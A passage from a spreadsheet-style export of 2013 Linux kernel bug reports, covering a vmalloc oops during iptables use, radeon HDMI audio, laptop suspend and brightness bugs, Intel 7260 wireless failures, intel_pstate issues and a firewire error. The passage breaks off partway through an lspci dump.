    <t>I'm using 3.10.12 kernel with massive iptables/ipset rules. On some iptables call inside a huge script I got the following Oops message: kernel BUG at mm/vmalloc.c:320! invalid opcode: 0000 [#1] SMP Modules linked in: xt_limit cls_u32 xt_DSCP xt_LOG ip_set_hash_ipport(O) ip_set_hash_net(O) ip_set_hash_ip(O) nf_nat_ftp nf_conntrack_ftp af_packet ixgbe(O) dca r8169 it87 hwmon_vid coret CPU: 1 PID: 16897 Comm: iptables Tainted: G O 3.10.12-AN4 #7 Hardware name: Gigabyte Technology Co., Ltd. B85-HD3/B85-HD3, BIOS F2 04/24/2013 task: e063a940 ti: e02a4000 task.ti: e02a4000 EIP: 0060:[&lt;c10bff67&gt;] EFLAGS: 00010207 CPU: 1 EIP is at __insert_vmap_area+0x87/0xb0 EAX: f456c30c EBX: e0245980 ECX: 00000000 EDX: 00000000 ESI: 00531000 EDI: ebe29600 EBP: 0052e000 ESP: e02a5d58 DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 CR0: 80050033 CR2: b6b52000 CR3: 20a1b000 CR4: 001407b0 DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000 DR6: fffe0ff0 DR7: 00000400 Stack: 00000001 00531000 c10c19e8 c10c0326 3a8dc163 00000001 ffffffff 00530fff f83fe000 00000000 f83fe000 00000000 e0245980 e0245980 014aa018 c10c1f8a e0245800 00000022 00000001 00530000 c10c1fb8 ffbfe000 00000000 000000d2 Call Trace: [&lt;c10c19e8&gt;] ? alloc_vmap_area+0x228/0x320 [&lt;c10c0326&gt;] ? vmap_page_range_noflush+0x1a6/0x260 [&lt;c10c1f8a&gt;] ? __get_vm_area_node+0x6a/0x160 [&lt;c10c1fb8&gt;] ? __get_vm_area_node+0x98/0x160 [&lt;c12cd106&gt;] ? xt_alloc_table_info+0xa6/0xc0 [&lt;c10c2308&gt;] ? __vmalloc_node_range+0x58/0x1e0 [&lt;c12cd106&gt;] ? xt_alloc_table_info+0xa6/0xc0 [&lt;c10c24f5&gt;] ? __vmalloc_node+0x65/0x80 [&lt;c12cd106&gt;] ? xt_alloc_table_info+0xa6/0xc0 [&lt;c10c264d&gt;] ? vmalloc_node+0x2d/0x40 [&lt;c12cd106&gt;] ? xt_alloc_table_info+0xa6/0xc0 [&lt;c12cd106&gt;] ? xt_alloc_table_info+0xa6/0xc0 [&lt;c131d5fc&gt;] ? do_ipt_set_ctl+0x13c/0x450 [&lt;c105f969&gt;] ? task_tick_fair+0x609/0x7d0 [&lt;c12bffc6&gt;] ? nf_sockopt+0xf6/0x110 [&lt;c12c0033&gt;] ? nf_setsockopt+0x23/0x30 [&lt;c12e1930&gt;] ? ip_setsockopt+0x80/0xa0 [&lt;c12819a3&gt;] ? sock_common_setsockopt+0x23/0x30 [&lt;c12801a3&gt;] ? SyS_setsockopt+0x73/0xd0 [&lt;c1281375&gt;] ? SyS_socketcall+0x135/0x2c0 [&lt;c10271e0&gt;] ? __do_page_fault+0x3c0/0x3c0 [&lt;c13372cc&gt;] ? syscall_call+0x7/0xb Code: 0c 8b 56 18 8d 4b 18 89 43 1c 89 53 18 89 4e 18 89 4a 04 5b 5e c3 8d b6 00 00 00 00 8b 53 04 3b 50 f4 76 07 8d 50 04 89 c1 eb 9d &lt;0f&gt; 0b eb fe a1 78 fd 42 c1 8d 53 18 c7 43 1c 78 fd EIP: [&lt;c10bff67&gt;] __insert_vmap_area+0x87/0xb0 SS:ESP 0068:e02a5d58 I cannot reproduce it directly. IMHO, possibly it may cause by race condition in vmalloc rb-tree manage</t>
  </si>
  <si>
    <t>3.11 radeon hdmi audio does not work</t>
  </si>
  <si>
    <t>2013-10-06 15:32 UTC</t>
  </si>
  <si>
    <t>pht</t>
  </si>
  <si>
    <t>2013-11-13 14:12 UTC</t>
  </si>
  <si>
    <t>Hello I have 01:05.0 VGA compatible controller: Advanced Micro Devices, Inc. [AMD/ATI] RS880 [Radeon HD 4200] 01:05.1 Audio device: Advanced Micro Devices, Inc. [AMD/ATI] RS880 HDMI Audio [Radeon HD 4200 Series] And I boot with radeon.audio=1 In previous kernel (3.10), sound works. With kernel 3.11 I can't hear the sound. The card is listed in alsamixer, and output is unmuted, but I can't simply hear the sound. Downgrade of kernel and reboot fixes the issue.</t>
  </si>
  <si>
    <t>[PATCH]EliteBoot hangs at dock, suspend, undock, resume</t>
  </si>
  <si>
    <t>3.12.2</t>
  </si>
  <si>
    <t>2013-10-10 09:46 UTC</t>
  </si>
  <si>
    <t>Tomaž Šolc</t>
  </si>
  <si>
    <t>2014-01-27 08:30 UTC</t>
  </si>
  <si>
    <t>Created attachment 110621 [details] console after hang, part 1 Hi HP EliteBook 8460p hangs if undocked from the docking station while the system is suspended. How to reproduce: While the laptop is docked, run "pm-suspend". Remove laptop from dock and press the power button. Virtual console switching still works, but all processes are frozen. Hang is reproducible on 3.11.4, 3.11.2. Resume works correctly on 3.9.6. Hung task timeout shows hang in kworker. Workqueue: events ata_scsi_hotplug [libata] See attached screenshots for the complete call trace. I can provide more information if needed. Thanks.</t>
  </si>
  <si>
    <t>3.11.5</t>
  </si>
  <si>
    <t>Mikhail</t>
  </si>
  <si>
    <t>i915 video: Initial brightness is zero</t>
  </si>
  <si>
    <t>2013-10-16 00:46 UTC</t>
  </si>
  <si>
    <t>Kirill Tkhai</t>
  </si>
  <si>
    <t>Created attachment 111171 [details] dmidecode Hi, ACPI Developers! The problem is that on my HP 250 G1 initial brightness of video is zero: $ cat /sys/class/backlight/acpi_video0/brightness 0 $ cat /sys/class/backlight/intel_backlight/brightness 0 This can be fixed with video.use_bios_initial_backlight=0 parameter advised by Jani Nikula here: https://bugs.freedesktop.org/show_bug.cgi?id=70256 He directed me to your bugzilla. Regards, Kirill</t>
  </si>
  <si>
    <t>Samsung N145 plus lid state 'toggle' incorrect</t>
  </si>
  <si>
    <t>2013-10-17 13:33 UTC</t>
  </si>
  <si>
    <t>Nick Warne</t>
  </si>
  <si>
    <t>2013-10-23 01:49 UTC</t>
  </si>
  <si>
    <t>Created attachment 111461 [details] Samsung N145 plus acpidump file As asked for by Lan Tianyu. Boot netbook: cat /proc/acpi/button/lid/LID0/state -&gt; OPEN Close lid, notebook goes to sleep. Open lid, notebook wakes up, but: cat /proc/acpi/button/lid/LID0/state -&gt; CLOSED I have to shut lid, then re-open again to get lid state to report OPEN. I do have a modified dsdt (it's not right, but not wrong either!) that gets around the issue sort off, but it appears to me that the method: Method (_Q5E, 0, NotSerialized) // _Qxx: EC Query { Store (LIDS, \LIDS) Notify (\_SB.LID0, 0x80) } isn't working, i.e. a hardware fault, in which case nothing can be done... but here's hoping. I have attached acpidump from kernel 3.11.5 built on Slackware 14 base, no modules, all built in. I also have my current changes to the dsdt file (with notes and a diff) here: http://linicks.net/dsdt/ to provide further info. Nick</t>
  </si>
  <si>
    <t>Bug with monitor mode on Intel 7260 AC</t>
  </si>
  <si>
    <t>3.8.0-19-generic</t>
  </si>
  <si>
    <t>2013-10-18 09:00 UTC</t>
  </si>
  <si>
    <t>Mark Wo</t>
  </si>
  <si>
    <t>2014-02-22 19:35 UTC</t>
  </si>
  <si>
    <t>I'm using Intel 7260 AC with this driver: https://www.kernel.org/pub/linux/kernel/projects/backports/stable/v3.11-rc3/ , with the "iwlwifi-7260-7.ucode" firmware. I'm using it in monitor mode to capture 802.11ac packets on channel 36. It works well, I can capture VHT packets without problems, but only as long as the number of packets per second being captured is relatively low, e.g. 10 or 20 packets per second. As soon as the traffic gets heavier, e.g. 100 packets per second, the card stops capturing *all* VHT packets within a second from the moment the traffic volume got higher. The interesting part is that it doesn't stop capturing altogether: it keeps on capturing 802.11n HT and legacy 802.11a packets, it just completely ignores 802.11ac VHT packets. Is there any way to fix this problem and ensure stable VHT capture?</t>
  </si>
  <si>
    <t>[HSW ULT]eDP brightness is zero after the computer start</t>
  </si>
  <si>
    <t>3.12.0rc3</t>
  </si>
  <si>
    <t>2013-10-30 05:03 UTC</t>
  </si>
  <si>
    <t>Qingshuai Tian</t>
  </si>
  <si>
    <t>Created attachment 112731 [details] dmesg System Environment: -------------------------- Kernel: (drm-intel-next-queued)92e76c8c7e436a07af3e0b594480ff8689add078 Some additional commit info: Author: Ville Syrjälä &lt;ville.syrjala@linux.intel.com&gt; Date: Mon Oct 21 19:01:58 2013 +0300 drm/i915: Clamp cursor coordinates to int16_t range Bug detailed description: ----------------------------- Everytime when the computer boot up into operating system, its eDP monitor will turn into black and its brightness is zero. But in the BIOS stage, the monitor works well. After the machine boot up, we can change the brightness with the function keys(Fn+F11),or we can also change the value of brightness in file (/sys/class/backlight/intel_backlight/brightness) .Then the monitor will work normally. Reproduce steps: ----------------------------- 1.boot up the machine 2.cat /sys/class/backlight/intel_backlight/brightness</t>
  </si>
  <si>
    <t>Intel Pstate driver minimum percent does not change with turbo off</t>
  </si>
  <si>
    <t>Intel Linux</t>
  </si>
  <si>
    <t>3.12rc7</t>
  </si>
  <si>
    <t>2013-11-02 21:42 UTC</t>
  </si>
  <si>
    <t>2014-11-03 21:34 UTC</t>
  </si>
  <si>
    <t>Created attachment 113141 [details] Frequency Vs. Requested Frequency When turbo is turned off the maximum frequency percent does not change. O.K. So the minimum frequency percent should change, but it doesn't. Using my computer as an example: The turbo on maximum frequency is 3.8 GHz; The turbo off maximum frequency is 3.4 GHz; The minimum frequency is 1.6 GHz. Therefore we would expect: For turbo on, max percent = 100, min percent = 42; For turbo off, max percent = 100, min percent = 47. starting from a fresh boot: doug@s15:~$ uname -a Linux s15 3.12.0-rc7+ #48 SMP Fri Nov 1 21:09:51 PDT 2013 x86_64 x86_64 x86_64 GNU/Linux doug@s15:~$ cat /sys/devices/system/cpu/intel_pstate/* 100 42 0 doug@s15:~$ cd temp doug@s15:~/temp$ sudo ./set_cpu_turbo_off [sudo] password for doug: doug@s15:~/temp$ cat /sys/devices/system/cpu/intel_pstate/* 100 42 1 doug@s15:~/temp$ cat set_cpu_turbo_off #! /bin/bash echo "1" &gt; /sys/devices/system/cpu/intel_pstate/no_turbo The attached png file demonstrates. (the rounding part will be a separate bug report) Note: This bug is extracted from bug 59481 which mentioned several issues, the main issue was solved and the bug closed. Now I am following up on the other issues.</t>
  </si>
  <si>
    <t>Intel Pstate driver truncates to pstate instead of rounding to nearest pstate</t>
  </si>
  <si>
    <t>intel_pstate</t>
  </si>
  <si>
    <t>2013-11-02 21:52 UTC</t>
  </si>
  <si>
    <t>2015-07-21 19:05 UTC</t>
  </si>
  <si>
    <t>Created attachment 113151 [details] shows rounded pstate and current actual for frequency Vs. requested. The Intel Pstate driver seems to truncate its calculations to the lower integer pstate. The suggestion is that it should round to the nearest pstate. Recent (kernel 3.12RC7) math improvements have made achieving 100% frequency better, but rounding would make it more robust. The attachment demonstrates.</t>
  </si>
  <si>
    <t>Intel Pstate driver - "kick" code is not needed</t>
  </si>
  <si>
    <t>2013-11-02 22:17 UTC</t>
  </si>
  <si>
    <t>2014-04-15 06:30 UTC</t>
  </si>
  <si>
    <t>There is code in the routine intel_pstate_timer_func to "kick" the CPU out of the minimum pstate. The code was added back when several things were not working properly with the driver. It was added due to a "ping-pong" issue uncovered by the Phoronix test suite ffpmeg test. I have tried extensively to recreate the issue with the "kick" code removed and have not been able to. I am unable to detect any difference with the ffmpeg test between the normal code and code with the "kick removed" The assertion is that the "kick" code is not required and should be deleted. This bug has been extracted from bug 59481 which ended up discussing a few tangent issues. The main issue was solved and the bug closed. Now I am following up on some of the tangent issues. I am saying the kick portion of this code can be removed because it serves no purpose and makes the code harder to read and understand: static void intel_pstate_timer_func(unsigned long __data) { struct cpudata *cpu = (struct cpudata *) __data; intel_pstate_sample(cpu); intel_pstate_adjust_busy_pstate(cpu); if (cpu-&gt;pstate.current_pstate == cpu-&gt;pstate.min_pstate) { cpu-&gt;min_pstate_count++; if (!(cpu-&gt;min_pstate_count % 5)) { intel_pstate_set_pstate(cpu, cpu-&gt;pstate.max_pstate); } } else cpu-&gt;min_pstate_count = 0; intel_pstate_set_sample_time(cpu); } Where this was left on 2013.07.18 with Dirk Brandewie was that he wanted to go back and verify in his test environment. Which, of course, should be done.</t>
  </si>
  <si>
    <t>Intel Wireless 7260 hardware timed out (lcpci -xxx returns 0xff) randomly</t>
  </si>
  <si>
    <t>3.12.0</t>
  </si>
  <si>
    <t>2013-11-07 04:44 UTC</t>
  </si>
  <si>
    <t>Zhuoyun Wei</t>
  </si>
  <si>
    <t>2014-06-03 22:48 UTC</t>
  </si>
  <si>
    <t>Created attachment 113711 [details] kernel messages when the bug occurs This bug was originally posted in Linux Wireless mailing lists. (Link: http://thread.gmane.org/gmane.linux.kernel.wireless.general/115259 ) Here is a brief summary of the whole story: (quoted from the author of iwlwifi.ko) * I have a ThinkPad X240s laptop (Haswell) with _OSC control *not* granted * L1 Active is enabled * kernel: 3.12.0 * Nic is PCIe (Gen2 but not sure...) At some random point, the driver loses access to the NIC: all readl operation return 0xff. Even lspci returns 0xff: 03:00.0 Network controller: Intel Corporation Wireless 7260 (rev ff) 00: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 10: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 20: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 30: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff here is the output of lspci *before* the issue hits: 03:00.0 Network controller: Intel Corporation Wireless 7260 (rev 6b) 00: 86 80 b2 08 06 04 10 00 6b 00 80 02 10 00 00 00 10: 04 00 40 f0 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 86 80 62 c2 30: 00 00 00 00 c8 00 00 00 00 00 00 00 09 01 00 00 Each time this bugs occurs, there will be some (to me) strange trace messages in kernel logs, as attached. For more logs such as the complete dmesg log, please refer to the mailing lists archive link above.</t>
  </si>
  <si>
    <t>iwlwifi get crashed frequently, intel wireless 7260</t>
  </si>
  <si>
    <t>3.12.1</t>
  </si>
  <si>
    <t>2013-11-10 03:02 UTC</t>
  </si>
  <si>
    <t>Javran Cheng</t>
  </si>
  <si>
    <t>2014-10-05 07:42 UTC</t>
  </si>
  <si>
    <t>Created attachment 114001 [details] dmesg output I have an intel wireless card: "Network controller: Intel Corporation Wireless 7260", which get discconnected from Internet frequently. Sometimes the corresponding interface "wlp4s0" even got disappeared under "/sys/class/net/". All I did was to download the proper "iwlwifi-7260-7.ucode", put it under "/lib/firmware" to get my card supported. I attached my `dmesg` output right after it got disconnected, it does seem like a crash was happened but I have no idea what exactly was the problem.</t>
  </si>
  <si>
    <t>firewire_ohci 0000:07:03.0: failed to read phy reg 2 (with LSI FW323 controller)</t>
  </si>
  <si>
    <t>3.10 and later</t>
  </si>
  <si>
    <t>2013-11-18 11:42 UTC</t>
  </si>
  <si>
    <t>2014-05-28 12:35 UTC</t>
  </si>
  <si>
    <t>Created attachment 115041 [details] dmesg output $ uname -a Linux ws166.afbank.ru 3.12.0-2.fc21.i686+PAE #1 SMP Sat Nov 9 21:31:51 UTC 2013 i686 i686 i386 GNU/Linux [root@ws166 ~]# lspci -vvv 00:00.0 Host bridge: Intel Corporation 82Q35 Express DRAM Controller (rev 02) Subsystem: Intel Corporation Device 4f4a Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- INTx- Latency: 0 Capabilities: [e0] Vendor Specific Information: Len=0b &lt;?&gt; 00:01.0 PCI bridge: Intel Corporation 82Q35 Express PCI Express Root Port (rev 02) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 00002000-00002fff Memory behind bridge: d0200000-d02fffff Prefetchable memory behind bridge: 00000000c0000000-00000000cfffffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA+ MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [88] Subsystem: Intel Corporation Device 4f4a Capabilities: [80] Power Management version 3 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst+ PME-Enable- DSel=0 DScale=0 PME- Capabilities: [90] MSI: Enable+ Count=1/1 Maskable- 64bit- Address: fee0300c Data: 41a1 Capabilities: [a0] Express (v1) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr- TransPend- LnkCap: Port #2, Speed 2.5GT/s, Width x16, ASPM L0s, Latency L0 &lt;256ns, L1 &lt;4us ClockPM- Surprise- LLActRep- BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x16, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug- Surprise- Slot #0, PowerLimit 75.000W; Interlock- NoCompl+ SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- LinkChg- Control: AttnInd Off, PwrInd On, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet+ Interlock- Changed: MRL- PresDet+ LinkState- RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- Capabilities: [100 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed- WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed- WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=01 Status: NegoPending- InProgress- Capabilities: [140 v1] Root Complex Link Desc: PortNumber=02 ComponentID=01 EltType=Config Link0: Desc: TargetPort=00 TargetComponent=01 AssocRCRB- LinkType=MemMapped LinkValid+ Addr: 00000000fed19000 Kernel driver in use: pcieport 00:03.0 Communication controller: Intel Corporation 82Q35 Express MEI Controller (rev 02) Subsystem: Intel Corporation Device 4f4a Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 49 Region 0: Memory at d0326100 (64-bit, non-prefetchable) [size=16] Capabilities: [50] Power Management version 3 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst+ PME-Enable- DSel=0 DScale=0 PME- Capabilities: [8c] MSI: Enable+ Count=1/1 Maskable- 64bit+ Address: 00000000fee0300c Data: 4182 Kernel driver in use: mei_me 00:19.0 Ethernet controller: Intel Corporation 82566DM-2 Gigabit Network Connection (rev 02) Subsystem: Intel Corporation Device 0001 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 48 Region 0: Memory at d0300000 (32-bit, non-prefetchable) [size=128K] Region 1: Memory at d0324000 (32-bit, non-prefetchable) [size=4K] Region 2: I/O ports at 3400 [size=32] Capabilities: [c8] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=1 PME- Capabilities: [d0] MSI: Enable+ Count=1/1 Maskable- 64bit+ Address: 00000000fee0200c Data: 41d2 Capabilities: [e0] Vendor Specific Information: Len=06 &lt;?&gt; Kernel driver in use: e1000e 00:1a.0 USB controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #4 (rev 02) (prog-if 00 [UHCI]) Subsystem: Intel Corporation Device 4f4a Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 18 Region 4: I/O ports at 30e0 [size=32] Capabilities: [50] Vendor Specific Information: Len=06 &lt;?&gt; Kernel driver in use: uhci_hcd 00:1a.1 USB controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #5 (rev 02) (prog-if 00 [UHCI]) Subsystem: Intel Corporation Device 4f4a Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin B routed to IRQ 21 Region 4: I/O ports at 30c0 [size=32] Capabilities: [50] Vendor Specific Information: Len=06 &lt;?&gt; Kernel driver in use: uhci_hcd 00:1a.2 USB controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #6 (rev 02) (prog-if 00 [UHCI]) Subsystem: Intel Corporation Device 4f4a Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin C routed to IRQ 17 Region 4: I/O ports at 30a0 [size=32] Capabilities: [50] Vendor Specific Information: Len=06 &lt;?&gt; Kernel driver in use: uhci_hcd 00:1a.7 USB controller: Intel Corporation 82801I (ICH9 Family) USB2 EHCI Controller #2 (rev 02) (prog-if 20 [EHCI]) Subsystem: Intel Corporation Device 4f4a Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin C routed to IRQ 17 Region 0: Memory at d0325c00 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Debug port: BAR=1 offset=00a0 Capabilities: [98] Vendor Specific Information: Len=06 &lt;?&gt; Kernel driver in use: ehci-pci 00:1b.0 Audio device: Intel Corporation 82801I (ICH9 Family) HD Audio Controller (rev 02) Subsystem: Intel Corporation Device 0012 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 50 Region 0: Memory at d0320000 (64-bit, non-prefetchable) [size=16K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=55mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [60] MSI: Enable+ Count=1/1 Maskable- 64bit+ Address: 00000000fee0300c Data: 41a2 Capabilities: [70] Express (v1) Root Complex Integrated Endpoint, MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag- RBE- FLReset+ DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop+ MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #0, Speed unknown, Width x0, ASPM unknown, Latency L0 &lt;64ns, L1 &lt;1us ClockPM- Surprise- LLActRep- BwNot- LnkCtl: ASPM Disabled; Disabled- Retrain- CommClk- ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed unknown, Width x0, TrErr- Train- SlotClk- DLActive- BWMgmt- ABWMgmt- Capabilities: [100 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed- WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed- WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=01 Status: NegoPending- InProgress- VC1: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed- WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=1 ArbSelect=Fixed TC/VC=80 Status: NegoPending- InProgress- Capabilities: [130 v1] Root Complex Link Desc: PortNumber=0f ComponentID=02 EltType=Config Link0: Desc: TargetPort=00 TargetComponent=02 AssocRCRB- LinkType=MemMapped LinkValid+ Addr: 00000000fed1c000 Kernel driver in use: snd_hda_intel 00:1c.0 PCI bridge: Intel Corporation 82801I (ICH9 Family) PCI Express Port 1 (rev 02) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=02, subordinate=02, sec-latency=0 I/O behind bridge: 00004000-00004fff Memory behind bridge: d0400000-d04fffff Prefetchable memory behind bridge: 00000000d0800000-00000000d09fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [40] Express (v1) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #1, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;1us, L1 &lt;4us ClockPM- Surprise- LLActRep+ BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk- ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x0, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug+ Surprise+ Slot #1, PowerLimit 10.000W; Interlock- NoCompl- SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- LinkChg- Control: AttnInd Unknown, PwrInd Unknown, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet- Interlock- Changed: MRL- PresDet- LinkState- RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- Capabilities: [80] MSI: Enable+ Count=1/1 Maskable- 64bit- Address: fee0300c Data: 41b1 Capabilities: [90] Subsystem: Intel Corporation Optiplex 755 Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [100 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed+ WRR32- WRR64- 